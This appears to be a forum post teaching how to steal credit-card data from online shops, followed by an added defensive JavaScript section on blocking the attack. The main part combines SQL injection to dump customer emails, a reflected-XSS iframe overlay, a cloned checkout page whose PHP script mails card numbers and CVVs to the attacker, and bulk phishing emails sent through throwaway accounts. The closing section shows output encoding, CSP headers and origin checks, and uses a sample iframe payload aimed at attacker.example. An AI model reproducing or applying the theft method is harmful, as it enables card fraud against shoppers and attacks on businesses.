
This is my method for getting fresh CC info, sent directly to an inbox of your choosing!

First, you need to find yourself a vulnerable shop. Won't go into too many details
here, this should be pretty drilled into your head by now. You can do this with
Google Dorks manually, or use tools like WebCruiser, SQLi poison, etc. What you're
looking for is a shop with both SQLi vulnerabilities, and XSS vulnerabilities.

First, as you may have noticed on most databases containing CC info, it's
encrypted, MD5, FPE, whatever it is it's not feasible to work with that. However,
one thing you can work with is the current and former customer's e-mail addresses.
Go ahead and rip the whole table with the customer information. If you're lucky,
you'll get at least 10,000 e-mail addresses or more.

Next, you need to work with the XSS vulnerability. I've noticed the most common
being POST vulnerability, so I'll go that route, but you can incorporate it with
FORM or whatever.

You can use the following code to make a redirect.html or whatever you wish to name
it. This page will load the vulnerable website immediately, with one exception, a
giant IFRAME over it which of course is going to be another page you make.
PHP Code:
<html>
<head>
<script language=javascript>
function submitPostLink()
:zin:{
document.postlink.submit();
}
</script>
</head>
<body onload="submitPostLink()">
<form action="https://www.XXXXXXXcom/TextSearch.asp" name=postlink method="post">
<input type="hidden" name="NAMEOFVULNERABLEFIELD" value="<iframe
src=&quot;Ecommerce Web Site Hosting and Streaming from YourHost.com
width=&quot;800&quot;height=&quot;2400&quot; style=&quot;z-index: 0; position:
absolute; top: 0; left: 0; overflow-y: hidden;&quot; frameborder=0
align=center></iframe>">
</form>
</body>
</html>
Go ahead and goto the checkout page for the site you're working with, and save the
page to your hard drive, including all the subdirectory files and images (firefox
does this auto). Now, you need to edit the main file you just saved.

Search for "action=", and change the page following it to your third page you will
make, which will be the PHP mail form that will send your e-mail all the
information someone fills in the form. The code will look something like....
PHP Code:
<?php
$userinfo = "@com"; //your email here
$ip = getenv("REMOTE_ADDR");
$message .= "".$_POST['firstname']."\n";
$message .= "".$_POST['lastname']."\n";
$message .= "".$_POST['org_name']."\n";
$message .= "".$_POST['telephone']."\n";
$message .= "".$_POST['fax']."\n";
$message .= "".$_POST['email']."\n";
$message .= "---------------------------------------------\n";
$message .= "".$_POST['cctype']."\n";
$message .= "".$_POST['credcard']."\n";
$message .= "".$_POST['exp_mon']."\n";
$message .= "".$_POST['exp_year']."\n";
$message .= "".$_POST['cccvv']."\n";
$message .= "".$_POST['ccname']."\n";

$subject="SUBJECT - $ip";
$headers = "From: NAMEl<@.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($userinfo,$subject,$message,$headers);
You'll want to follow this code with some html code that also looks like a copy of
their site but with some text saying something along the lines of "sorry, this
offer is no longer available" or something of the sort. I'll explain why right now.

After putting all this together and uploading it to a host, you'll want to shorten
your redirect.html URL, you can use bit.ly, or another shortening service. Then,
you can send an e-mail to all the customers e-mail addresses, (AND YOU CAN BE
CREATIVE), but something along the lines of them being a valuable customer, and
because of that, you're giving them one of your newest products for only 99 cents!
Make sure that on your checkout form, you list the item you choose, so they see it
when they're checking out.

A great service to send bulk mail for FREE, and no trial or anything, that is if
you don't have hacked SMTP to use, is targethero.com

They let you send Unlimited e-mails to up to 5,000 different contacts. Not bad for
free. You'll have to confirm your account with a cell phone, but you should just
use receive-sms-online.com or freesmsreceive.com/index.php where you can get SMS
sent to you with no registration.

Trust me, if you send enough e-mails to former customers, especially when it's in
the health and supplement niche, if they get an offer for a 99 cent bottle or
something, they're gonna jump all over that!

Anyway, if you have any questions, please feel free to ask, and I apologize if I
was a little vague but I don't have much time right now but wanted to get this up.
Enjoy!!!
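
Seen from the shop's side, the injected IFRAME in this post depends on three things the site controls: the search field being echoed without encoding, the page being allowed to load frames from other origins, and the endpoint accepting a form posted from another site. The following is an added example, not part of the original post, showing those three controls in JavaScript (Node); the function names, `shop.example` and the sample value are constructed for illustration.

```javascript
// Added defensive example. All names and sample values are constructed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a value for an HTML text or quoted-attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the posted search term is concatenated into markup as-is.
function renderSearchUnsafe(term) {
  return `<p>Results for: ${term}</p>`;
}

// Hardened pattern: same page, term encoded on output.
function renderSearch(term) {
  return `<p>Results for: ${escapeHtml(term)}</p>`;
}

// Headers that contain the damage if an encoding bug slips through.
function securityHeaders() {
  return {
    'Content-Security-Policy':
      "default-src 'self'; frame-src 'self'; form-action 'self'; frame-ancestors 'self'",
    'X-Content-Type-Options': 'nosniff',
  };
}

// Accept a POST only when Origin (or, failing that, Referer) matches the site.
// Assumption: requests carrying neither header are rejected.
function isSameOriginPost(headers, siteOrigin) {
  if (headers.origin) return headers.origin === siteOrigin;
  if (!headers.referer) return false;
  try {
    return new URL(headers.referer).origin === siteOrigin;
  } catch {
    return false;
  }
}

// Constructed sample of the kind of value the post places in the search field.
const SAMPLE = '<iframe src="https://attacker.example/overlay"></iframe>';
console.log(renderSearchUnsafe(SAMPLE));
console.log(renderSearch(SAMPLE));
console.log(isSameOriginPost({ origin: 'https://attacker.example' }, 'https://shop.example'));
```

With output encoding in place the posted markup is displayed as text, and the `frame-src` and `form-action` directives keep a page from loading an off-site frame or posting a form off-site even where an encoding bug remains.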
